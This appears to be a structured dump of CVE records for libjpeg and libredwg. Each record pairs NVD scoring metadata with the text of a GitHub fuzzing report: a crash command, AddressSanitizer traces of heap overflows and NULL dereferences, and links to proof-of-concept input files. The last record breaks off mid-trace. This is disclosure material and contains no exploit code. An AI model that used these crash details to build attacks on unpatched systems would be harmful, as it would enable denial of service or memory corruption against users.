## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), jpeg (latest master [e52406](https://github.com/thorfdbg/libjpeg/commit/e524066cc8f532e37cf2360c9c33852b8b64f1da)) ## Command line ./jpeg -oz -h -s 1x1,2x2,2x2 @@ /dev/null ## Output ``` *** Warning -1038 in Tables::ParseTables, line 1384, file tables.cpp *** Reason is: found invalid marker, probably a marker size is out of range *** Warning -1038 in Frame::StartParseHiddenScan, line 869, file frame.cpp *** Reason is: Start of Scan SOS marker missing *** Warning -1038 in Frame::ParseTrailer, line 1083, file frame.cpp *** Reason is: missing an EOI marker at the end of the stream *** Warning -1038 in Image::ParseTrailer, line 1464, file image.cpp *** Reason is: expecting an EOI marker at the end of the stream Segmentation fault ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==56860==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000086f67b bp 0x7ffcf2756d80 sp 0x7ffcf2756c20 T0) #0 0x86f67a in BlockBitmapRequester::ReconstructUnsampled(RectangleRequest const*, RectAngle<int> const&, unsigned int, ColorTrafo*) /home/seviezhou/libjpeg/control/blockbitmaprequester.cpp:1047 #1 0x486b6c in Image::ReconstructRegion(BitMapHook*, RectangleRequest const*) /home/seviezhou/libjpeg/codestream/image.cpp:1111 #2 0x45f10a in JPEG::InternalDisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:721 #3 0x45f452 in JPEG::DisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:699 #4 0x42c573 in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:320 #5 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #6 0x7fe0a1fc283f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x409da8 in _start (/home/seviezhou/libjpeg/jpeg+0x409da8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/libjpeg/control/blockbitmaprequester.cpp:1047 BlockBitmapRequester::ReconstructUnsampled(RectangleRequest const*, RectAngle<int> const&, unsigned int, ColorTrafo*) ==56860==ABORTING ``` ## POC [SEGV-ReconstructUnsampled-blockbitmaprequester-1047.zip](https://github.com/thorfdbg/libjpeg/files/5019781/SEGV-ReconstructUnsampled-blockbitmaprequester-1047.zip)
Segmentation fault in blockbitmaprequester.cpp:1047
https://api.github.com/repos/thorfdbg/libjpeg/issues/33/comments
1
2020-08-04T01:54:43Z
2020-08-29T07:47:06Z
https://github.com/thorfdbg/libjpeg/issues/33
672,446,762
33
2,540
CVE-2021-39518
2021-09-20T16:15:11.730
An issue was discovered in libjpeg through 2020021. LineBuffer::FetchRegion() in linebuffer.cpp has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A34FCBC-1BCC-4595-9283-0986879CDFDD", "versionEndExcluding": null, "versionEndIncluding": "2020021", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/thorfdbg/libjpeg/issues/35
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), jpeg (latest master [e52406](https://github.com/thorfdbg/libjpeg/commit/e524066cc8f532e37cf2360c9c33852b8b64f1da)) ## Command line ./jpeg -oz -h -s 1x1,2x2,2x2 @@ /dev/null ## Output ``` *** Warning -1038 in Tables::ParseTables, line 1384, file tables.cpp *** Reason is: found invalid marker, probably a marker size is out of range *** Warning -1038 in Frame::ParseTrailer, line 1083, file frame.cpp *** Reason is: missing an EOI marker at the end of the stream *** Warning -1038 in Image::ParseTrailer, line 1464, file image.cpp *** Reason is: expecting an EOI marker at the end of the stream Segmentation fault ``` ## AddressSanitizer output ``` ================================================================= ==35214==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009fd0 at pc 0x7f06d39ea935 bp 0x7fff3a80bdc0 sp 0x7fff3a80b568 READ of size 32 at 0x611000009fd0 thread T0 #0 0x7f06d39ea934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934) #1 0x8583e2 in LineBuffer::FetchRegion(int, Line const*, int*) /home/seviezhou/libjpeg/control/linebuffer.cpp:322 #2 0x87ef78 in LineBitmapRequester::ReconstructRegion(RectAngle<int> const&, RectangleRequest const*) /home/seviezhou/libjpeg/control/linebitmaprequester.cpp:513 #3 0x486b6c in Image::ReconstructRegion(BitMapHook*, RectangleRequest const*) /home/seviezhou/libjpeg/codestream/image.cpp:1111 #4 0x45f10a in JPEG::InternalDisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:721 #5 0x45f452 in JPEG::DisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:699 #6 0x42c573 in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:320 #7 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #8 0x7f06d2ec883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #9 0x409da8 in _start (/home/seviezhou/libjpeg/jpeg+0x409da8) 0x611000009fd0 is located 0 bytes to the right of 208-byte region [0x611000009f00,0x611000009fd0) allocated by thread T0 here: #0 0x7f06d39f6602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x44cadf in Environ::CoreAllocMem(unsigned int, unsigned int) /home/seviezhou/libjpeg/tools/environment.cpp:664 #2 0x856107 in LineBuffer::StartMCUQuantizerRow(Scan*) /home/seviezhou/libjpeg/control/linebuffer.cpp:227 #3 0x45c94d in JPEG::ReadInternal(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:324 #4 0x45d5be in JPEG::Read(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:210 #5 0x42adbf in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:121 #6 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #7 0x7f06d2ec883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c227fff93a0: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa 0x0c227fff93b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff93c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff93d0: 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa 0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==35214==ABORTING ``` ## POC [heap-overflow-FetchRegion-linebuffer-322.zip](https://github.com/thorfdbg/libjpeg/files/5019793/heap-overflow-FetchRegion-linebuffer-322.zip)
A heap overflow in linebuffer.cpp:322 causes segment fault
https://api.github.com/repos/thorfdbg/libjpeg/issues/35/comments
1
2020-08-04T02:45:44Z
2020-08-29T07:30:07Z
https://github.com/thorfdbg/libjpeg/issues/35
672,463,749
35
2,541
CVE-2021-39519
2021-09-20T16:15:11.773
An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function BlockBitmapRequester::PullQData() located in blockbitmaprequester.cpp It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A34FCBC-1BCC-4595-9283-0986879CDFDD", "versionEndExcluding": null, "versionEndIncluding": "2020021", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/thorfdbg/libjpeg/issues/28
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), jpeg (latest master [e52406](https://github.com/thorfdbg/libjpeg/commit/e524066cc8f532e37cf2360c9c33852b8b64f1da)) ## Command line ./jpeg -oz -h -s 1x1,2x2,2x2 @@ /dev/null ## Output ``` For license conditions, see README.license for details. *** Warning -1038 in Tables::ParseTables, line 1384, file tables.cpp *** Reason is: found invalid marker, probably a marker size is out of range *** Warning -1038 in Frame::StartParseHiddenScan, line 869, file frame.cpp *** Reason is: Start of Scan SOS marker missing *** Warning -1038 in Frame::ParseTrailer, line 1083, file frame.cpp *** Reason is: missing an EOI marker at the end of the stream *** Warning -1038 in Image::ParseTrailer, line 1464, file image.cpp *** Reason is: expecting an EOI marker at the end of the stream Segmentation fault ``` ## AddressSanitizer output ``` ================================================================= ==15013==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000087109c bp 0x7fff76b3e9c0 sp 0x7fff76b3e760 T0) #0 0x87109b in BlockBitmapRequester::PullQData(RectangleRequest const*, RectAngle<int> const&) /home/seviezhou/libjpeg/control/blockbitmaprequester.cpp:1100 #1 0x8742e9 in BlockBitmapRequester::ReconstructRegion(RectAngle<int> const&, RectangleRequest const*) /home/seviezhou/libjpeg/control/blockbitmaprequester.cpp:1249 #2 0x486b6c in Image::ReconstructRegion(BitMapHook*, RectangleRequest const*) /home/seviezhou/libjpeg/codestream/image.cpp:1111 #3 0x45f10a in JPEG::InternalDisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:721 #4 0x45f452 in JPEG::DisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:699 #5 0x42c573 in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:320 #6 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #7 0x7f727943883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #8 0x409da8 in _start (/home/seviezhou/libjpeg/jpeg+0x409da8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/libjpeg/control/blockbitmaprequester.cpp:1100 BlockBitmapRequester::PullQData(RectangleRequest const*, RectAngle<int> const&) ==15013==ABORTING ``` ## POC [SEGV-PullQData-blockbitmaprequester-1100.zip](https://github.com/thorfdbg/libjpeg/files/5019733/SEGV-PullQData-blockbitmaprequester-1100.zip)
Segmentation fault in blockbitmaprequester.cpp:1100
https://api.github.com/repos/thorfdbg/libjpeg/issues/28/comments
1
2020-08-01T14:34:03Z
2020-08-29T08:26:13Z
https://github.com/thorfdbg/libjpeg/issues/28
670,921,724
28
2,542
CVE-2021-39520
2021-09-20T16:15:11.813
An issue was discovered in libjpeg through 2020021. A NULL pointer dereference exists in the function BlockBitmapRequester::PushReconstructedData() located in blockbitmaprequester.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A34FCBC-1BCC-4595-9283-0986879CDFDD", "versionEndExcluding": null, "versionEndIncluding": "2020021", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/thorfdbg/libjpeg/issues/34
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), jpeg (latest master [e52406](https://github.com/thorfdbg/libjpeg/commit/e524066cc8f532e37cf2360c9c33852b8b64f1da)) ## Command line ./jpeg -oz -h -s 1x1,2x2,2x2 @@ /dev/null ## Output ``` *** Warning -1038 in Frame::ParseTrailer, line 1088, file frame.cpp *** Reason is: expecting a marker or marker segment - stream is out of sync Segmentation fault ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==26800==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000873314 bp 0x7ffe658218c0 sp 0x7ffe65821780 T0) #0 0x873313 in BlockBitmapRequester::PushReconstructedData(RectangleRequest const*, RectAngle<int> const&, unsigned int, ColorTrafo*) /home/seviezhou/libjpeg/control/blockbitmaprequester.cpp:1182 #1 0x486b6c in Image::ReconstructRegion(BitMapHook*, RectangleRequest const*) /home/seviezhou/libjpeg/codestream/image.cpp:1111 #2 0x45f10a in JPEG::InternalDisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:721 #3 0x45f452 in JPEG::DisplayRectangle(JPG_TagItem*) /home/seviezhou/libjpeg/interface/jpeg.cpp:699 #4 0x42c573 in Reconstruct(char const*, char const*, int, char const*, bool) /home/seviezhou/libjpeg/cmd/reconstruct.cpp:320 #5 0x4055f0 in main /home/seviezhou/libjpeg/cmd/main.cpp:718 #6 0x7fdecbdba83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x409da8 in _start (/home/seviezhou/libjpeg/jpeg+0x409da8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/libjpeg/control/blockbitmaprequester.cpp:1182 BlockBitmapRequester::PushReconstructedData(RectangleRequest const*, RectAngle<int> const&, unsigned int, ColorTrafo*) ==26800==ABORTING ``` ## POC [SEGV-PushReconstructedData-blockbitmaprequester-1182.zip](https://github.com/thorfdbg/libjpeg/files/5019750/SEGV-PushReconstructedData-blockbitmaprequester-1182.zip)
Segmentation fault in blockbitmaprequester.cpp:1182
https://api.github.com/repos/thorfdbg/libjpeg/issues/34/comments
1
2020-08-04T02:30:41Z
2020-08-29T07:31:47Z
https://github.com/thorfdbg/libjpeg/issues/34
672,458,755
34
2,543
CVE-2021-39521
2021-09-20T16:15:11.857
An issue was discovered in libredwg through v0.10.1.3751. A NULL pointer dereference exists in the function bit_read_BB() located in bits.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/262" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/262" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/262
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwg2dxf (latest master [bacd017](https://github.com/LibreDWG/libredwg/commit/bacd01778d20b7b79f28541ea7a60cafe25175aa)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwg2dxf -b -m ./SEGV-bit_read_BB-bits-186 -o /dev/null ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==33413==ERROR: AddressSanitizer: SEGV on unknown address 0x63001eedeec1 (pc 0x56001ae1aa1c bp 0x7ffc0f008820 sp 0x7ffc0f008570 T0) #0 0x56001ae1aa1b in bit_read_BB /home/seviezhou/libredwg/src/bits.c:186 #1 0x56001ae3d11b in bit_read_BS /home/seviezhou/libredwg/src/bits.c:525 #2 0x56001ae3d11b in bit_read_TU /home/seviezhou/libredwg/src/bits.c:1891 #3 0x56001ae4d52b in bit_read_CMC /home/seviezhou/libredwg/src/bits.c:2610 #4 0x56001a5261c2 in dwg_decode_VIEWPORT_private /home/seviezhou/libredwg/src/dwg.spec:1674 #5 0x56001aef02ff in dwg_decode_VIEWPORT /home/seviezhou/libredwg/src/dwg.spec:1607 #6 0x56001aef02ff in dwg_decode_add_object /home/seviezhou/libredwg/src/decode.c:5583 #7 0x56001aef77b8 in read_2004_section_handles /home/seviezhou/libredwg/src/decode.c:2843 #8 0x56001aef77b8 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3682 #9 0x56001af060ba in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #10 0x56001adfcd94 in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #11 0x56001adfa242 in main /home/seviezhou/libredwg/programs/dwg2dxf.c:258 #12 0x7f13152a8b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #13 0x56001adfb2b9 in _start (/home/seviezhou/libredwg/programs/dwg2dxf+0xa8d2b9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/libredwg/src/bits.c:186 bit_read_BB ==33413==ABORTING ``` ## POC [SEGV-bit_read_BB-bits-186.zip](https://github.com/LibreDWG/libredwg/files/5016490/SEGV-bit_read_BB-bits-186.zip)
A Segmentation fault in bits.c:186
https://api.github.com/repos/LibreDWG/libredwg/issues/262/comments
2
2020-08-03T14:19:33Z
2020-08-04T09:51:29Z
https://github.com/LibreDWG/libredwg/issues/262
672,111,174
262
2,544
CVE-2021-39522
2021-09-20T16:15:11.900
An issue was discovered in libredwg through v0.10.1.3751. bit_wcs2len() in bits.c has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/255" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/255" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "937A8147-F4AB-4717-9E3F-4CFDF8194421", "versionEndExcluding": null, "versionEndIncluding": "0.10.1.3751", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/255
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), dwg2dxf (latest master [aee0ea](https://github.com/LibreDWG/libredwg/commit/aee0ea1f52ef9603b981362c83b3fec324ebb199)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./programs/dwg2dxf -b -m ./heap-buffer-overflow-bit_wcs2len-bits-1634 -o /dev/null ## AddressSanitizer output ``` ================================================================= ==15425==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000ec80 at pc 0x561b14ea8544 bp 0x7ffcc39e7810 sp 0x7ffcc39e7800 READ of size 2 at 0x61600000ec80 thread T0 #0 0x561b14ea8543 in bit_wcs2len /home/seviezhou/libredwg/src/bits.c:1634 #1 0x561b145837d0 in dwg_decode_LTYPE_private /home/seviezhou/libredwg/src/dwg.spec:3018 #2 0x561b14f5906b in dwg_decode_LTYPE /home/seviezhou/libredwg/src/dwg.spec:2936 #3 0x561b14f5906b in dwg_decode_add_object /home/seviezhou/libredwg/src/decode.c:5660 #4 0x561b14f60d90 in read_2004_section_handles /home/seviezhou/libredwg/src/decode.c:2835 #5 0x561b14f60d90 in decode_R2004 /home/seviezhou/libredwg/src/decode.c:3671 #6 0x561b14f6f3db in dwg_decode /home/seviezhou/libredwg/src/decode.c:242 #7 0x561b14e6a1fc in dwg_read_file /home/seviezhou/libredwg/src/dwg.c:251 #8 0x561b14e67594 in main /home/seviezhou/libredwg/programs/dwg2dxf.c:258 #9 0x7fdefebffb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x561b14e68689 in _start (/home/seviezhou/libredwg/programs/dwg2dxf+0xa4b689) 0x61600000ec81 is located 0 bytes to the right of 513-byte region [0x61600000ea80,0x61600000ec81) allocated by thread T0 here: #0 0x7fdeff4057aa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987aa) #1 0x561b14ea4348 in bit_read_TF /home/seviezhou/libredwg/src/bits.c:1444 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libredwg/src/bits.c:1634 bit_wcs2len Shadow bytes around the buggy address: 0x0c2c7fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff9d90:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9de0: 00 